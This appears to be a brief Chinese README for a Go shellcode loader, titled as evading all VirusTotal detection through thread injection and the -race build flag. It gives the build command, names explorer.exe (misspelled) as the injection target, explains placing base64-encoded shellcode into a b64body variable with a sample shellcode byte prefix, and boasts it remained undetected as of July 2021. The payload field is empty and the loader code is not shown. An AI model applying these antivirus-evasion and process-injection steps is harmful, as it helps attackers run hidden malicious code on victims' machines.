通过线程注入及-race参数免杀全部VT
go build -ldflags "-s -w" -race main.go其中代码默认注入进程是exploer.exe,位于22行,inProcessName参数。
inProcessName = "exploer.exe"shellcode生成后使用base64编码一次放入b64body即可
//使用\x这种格式的shellcode,如:\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00
b64body = ""截至2021/7/10 幸免于世
